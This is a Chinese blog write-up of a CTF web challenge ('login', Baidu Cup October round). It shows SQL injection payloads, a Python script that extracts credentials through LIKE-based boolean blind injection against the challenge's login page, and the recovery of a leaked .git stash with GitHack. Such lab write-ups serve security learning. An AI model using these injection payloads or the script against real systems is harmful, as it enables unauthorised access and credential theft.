[百度杯] 十月场 登陆 writeup

最新推荐文章于 2021-08-30 23:44:04 发布
最新推荐文章于 2021-08-30 23:44:04 发布
阅读量1.9k 收藏 1
点赞数 1
分类专栏: ctf 文章标签: git泄漏 布尔盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37921080/article/details/79972064
版权

c26老哥的视频教程十分的详细了,这里我主要说一下自己在这道题里踩到的坑,避免下次再犯。
视频链接: http://www.ichunqiu.com/ourse/56093

1 、登陆步骤

先试一了以下万能密码 admin’ or ‘1’=’1 发现有两种报错响应,“用户名不存在”和“密码错误”,明显的是布尔值盲注。很开心,哪脚本跑一下,发现mid, substr, left ,search 等很多函数都不能使用,当时就很崩溃,又找不到绕过的方法。然后看c26老哥的视频,发现他采用了 regexp 正则表达式的方式进行注入。然后我就用他的思路,试了一下like方法。发现like方法也可以,类似: admin’ or database() like ‘c%’ ;# 这样的。但是不能用search怎么找字段名呢?看视频知道,

<html>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<head>
   <title>Login</title>
</head>

   <form action="login.php" method="post">
   用户名:<input type="text" name="username" class="user_n3me">
   密码:  <input type="password" name="password" class="p3ss_w0rd">
   <input type="submit" value="提交">
   </form>
</body>
</html>

观察网页源码,尝试用两个input的class名作为数据库的字段名。真是好思路啊。
然后就拿到了名称和密码,脚本如下:

import string
import requests


url = 'http://b507d5c3421f4533a1546f7239ccf22721074858f4924a1a.game.ichunqiu.com/Challenges/login.php'
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
payloads = string.ascii_letters + string.digits
temp = ''
for i in range(40):
    print("hello")
    for p in payloads:
        payload = temp + p
        name = "admin' or user_n3me like '{}%' ;#".format(payload)
        data = dict(username=name, passwrod='test')
        res = requests.post(url, headers=headers, data=data)
        if (len(res.content) == 12):
            temp = temp + p
            print(temp.ljust(32, '.'))
            break

2 、git泄漏

登陆之后,根据页面显示发现是git泄漏,这里觉得ctf题里面无论是多么奇怪的字符串,都会有它特殊的含义。

然后利用脚本还原git库,我先试了以下rip-git,结果是下载不完整,没有关于falg的信息。根据视频里的提示,我们访问
/ctfg1t/refs/stash 的到一个字符串,然后根据这个字符串进行下载,最后找到了有关flag信息的文件,那到底是怎么回事呢?
其实题目里有提示, “缓存”, git stash 命令会为跟踪已修改的文件建立一次特殊的commit,这次”commit’不能在git log 中显示,不作为正式的commit, 但会作为stash被记录在stash栈里面。这样,如果遇到紧急bug,就会先stash 当前的工作,然后回退到之前的commit, 进行修改,然后stash pop 恢复之前的工作。避免了提交新的commit 导致污染提交记录。
我们到stash里面的commit文件后,根据里面的内容找到tree文件,然后再找到blob文件,得到关于flag的信息,如果不明白什么叫commit文件,tree文件,blob文件,可以看这篇博客:https://blog.csdn.net/i_enum/article/details/50557367
但是这样真的很麻烦,然后我在github上找了一个其他的脚本,用着不错,可以把整个git库都下载下来,
链接:https://github.com/BugScanTeam/GitHack 注意是python2
然后操作就一样了,你可以直接git cat-file -p 所有对象文件,也可以根据stash的信息,一步步找到需要的文件。

Flyour
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
i春秋 “百度CTF比赛 十月 vld writeup
weixin_43442029的博客
01-19 671
0x00 题目名字叫“vld”,打开链接后也提示“do you know Vulcan Logic Dumper?” 同时在源码也给了一个文件位置。 打开文件后是一堆看不懂的东西,在网上搜索一下Vulcan Logic Dumper,发现是一个php的调试器,index.php.txt里的内容是php的详细的运行过程。大概的逻辑是比较三个get参数的值,正确就输出下一条线索,错误就输出false...
i春秋 “百度CTF比赛 十月 Gift
include_heqile的博客
10-24 2460
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
百度CTF比赛 十月 Not Found
feng的博客
10-01 1685
前言 有一说一,这题还是挺阴间的。不过自己也是学习了新的姿势。 WP 进入之后提示404.php没有,然后扫一下目录发现1.php,访问也没有flag,再直接访问404.php是haha(出题人出来挨打)。之后进行一些尝试均已失败告终,去看了看WP。 首先就是直接访问网站的时候,响应头里有一个x-method是haha: 原来这是提示我们要换请求方式(出题人在哪????haha 什么呢????) HTTP请求就那几种方式,挨个试,在试到OPTIONS的时候出现了重定向: 点一下关注重定向: 发现请求变
i春秋——“百度CTF比赛 十月——Not Found(http请求方法,client-ip伪造ip)...
weixin_30426957的博客
10-14 483
这道题也是让我很迷。。。 打开就是not found,让我一度以为是服务器挂了,细看发现有个404.php 访问也没发现什么东西,只有来自出题人的嘲讽 haha~ 不过在首页的header中发现个奇怪的东西,X-Method:haha,先记着,继续找线索 用cansina扫描发现一个文件 1.php,不过访问也没发现什么有用的东西,只提示 not here,plese try...
CTF日记之 “百度CTF比赛 十月 GetFlag
sunleibaba的博客
01-27 481
CTF日记:“百度CTF比赛 十月 GetFlag 打开题目,看到一个被嘲讽的界面,然鹅自己并不是单身狗。。。正常思路,查看源码,发现正常,之后点击login: 还是先查看源码,发现有没有疏漏什么东西,发现一切正常,在进行抓包看看有没有什么疏漏的东西,发现也一切正常,下面开始把关注点放在这个页面上面。正常的登录框,再加上一个验证码,这个验证码的意思是:一个数的md5值的前六位是afce73,那我们就进行爆破计算: python脚本 import hashlib i=1 while True:
百度CTF比赛 十月 writeup
weixin_45871855的博客
08-30 1171
分值:10分 类型:Misc题目名称:考眼力未解答 题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1434
1. mysql盲注及脚本编写 2. .git泄露
2023 强网 Writeup
最新发布
01-29
2023 强网 Writeup
网鼎writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用[email protected]
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
2019美亚writeup
03-26
2019美亚writeup
强网 WriteUp By Nu1L
08-02
2022年第六届“强网”全国网络安全挑战赛
百度CTF比赛 十月 login
Naptmn的博客
11-16 835
1、打开题目 打开题目发现是登录窗口,之后f12发现疑似账号密码的东西,之后输入发现确实是账号密码。 登录之后发现了一串颜文字。 2、bp抓包 因为已经找到了账号密码,所以大概率就不是注入了。之后考虑302跳转,所以进行bp抓包(记得抓的是登录后的包!!!别抓错了)。 并没有跳转,但是在response中发现一个奇怪的参数show:0,考虑是不是应该把他放到包里再来一次。试试就试试。 传递方式注意的是:上面的网址看清楚(我不知道为什么会莫名多出来几个包) show:后面加个空格 之后看response
百度CTF比赛 十月 GetFlag
feng的博客
09-30 515
这题主要考察了用python写脚本来爆破md5,然后是SQL注入中的万能密码,然后是文件下载后最后对eval函数的考察。
百度CTF比赛 十月Backdoor(git泄露)
weixin_43610673的博客
03-22 719
访问/Challenges/.git 发现返回403 上GitHack 查看fiag.php源码 按经验flag就在这,猜测要版本回滚,访问/Challenges/.git/logs/HEAD 使用Git_Extract会自动解析提取这些commit 访问b4ckdo0r.php 尝试.b4ckdo0r.php.swo和.b4ckdo0r.php.swp 丢到kali中 用vim打...
CTF日记之 “百度CTF比赛 十月
sunleibaba的博客
01-28 440
CTF日记:“百度CTF比赛 十月 Vld 点开之后发现: 还是先查看源代码: 访问: index.php.txt 发现了一堆这个东西,然后根据之前的界面上写的do you know Vulcan Logic Dumper?,百度一下“Vulcan Logic Dumper”: 这肯定就是所谓的Vulcan Logic Dumper了,先了解下相关概念 PHP内核-Zend引擎:http://www.php.cn/php-weizijiaocheng-355597.html PHP中的opc
百度CTF比赛 十月 -------Login
大方子
08-01 3291
============================================================= 个人收获: 1.多观察网页的源代码 2.多留意http的访问信息 3.多留意http头参数的变化 4.收获了unserialize,gzuncompress参数的认识 ================================================...
[百度]九月 YeserCMS writeup
Flyour的博客
04-05 2550
Yesercms 题目里面说这是一个新的cms,让大家测一测有没有漏洞。哼,都是套路。 老规矩: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 看一下网站内容,没有明显的标志标明是什么cms。不过当我浏览一遍网站的内容后,发现这个网站真是东拼西凑啊,又是卖电子产品,...
陇剑writeup
07-28
然而,你的问题是关于"陇剑writeup",但是在提供的引用内容中并没有提到这个问题的相关信息。请提供更多的上下文或明确你的问题,以便我能够为你提供更准确的答案。 #### 引用[.reference_title] - *1* *2* *3* [...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值